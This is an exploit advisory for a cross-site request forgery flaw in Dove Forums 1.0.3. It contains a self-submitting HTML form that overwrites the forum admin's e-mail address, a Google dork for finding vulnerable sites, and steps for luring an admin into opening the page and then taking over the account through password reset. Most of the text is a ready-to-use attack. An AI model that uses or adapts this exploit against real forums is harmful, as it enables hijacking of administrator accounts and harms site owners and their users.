Dove Forums version 1.0.3 suffers from a cross site request forgery vulnerability.
03a69411efa7ea797c72c3c1d9d50aec88ce945f381905f67ca1dae3d0077606
In The Name Of Allah
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# Exploit Title:Dove Forums-Add admin CSRF # @@@@@ |
# Date : 2012-06-26 # @ @ +
# Author :Ashiyane Digitl Security Team # @ @@@ @ |
# Vendor :http://www.doveforums.com/ # @ @ @ @ +
# Version: 1.0.3 # @ @@ @ |
# e-mail: Gigelaknak [at] Yahoo [dot] com # W @ @ W +
# Visit us: ashiyane.org/forums # s s |
# Category: Webapps # s s +
# Google dork:"Powered By Dove Forums Version: 1.0.3"# s s |
# Demo site: http://allcrew.eu/forum/ # SS +
# Tested on: # s s |
# s s +
# W W |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
1.Replace the forum path of your target with http://localhost/ at the second line of exploit code
2.Replace your e-mail with Gigelaknak@yahoo.com at the third line of exploit code
3.Save the exploit code as .html file and upload it some where ,Then give the link to admin using social engineering !
4.After admin opened the link ,click on the "Forgot Password" and get the Admin password on your E-mail ;)
5. Good Luck B-)
Tnx 2 N.A And all Iranian Hackers ...
Exploit Code :
<html>
<form name="csrf" action="http://localhost/index.php/admin/users/update/1" class="form" method="post" accept-charset="utf-8">
<input type="hidden" name="Username" value="admin" id="Username" class="textbox" />
<input type="hidden" name="Email" value="Gigelaknak@yahoo.com" id="Email" class="textbox" />
<select name="group">
<option value="1" selected="selected">admin</option>
</select>
<input type="checkbox" name="Active" value="1" checked="checked" id="Active" class="checkbox" />
</from>
<script>document.csrf.submit();</script>
</html>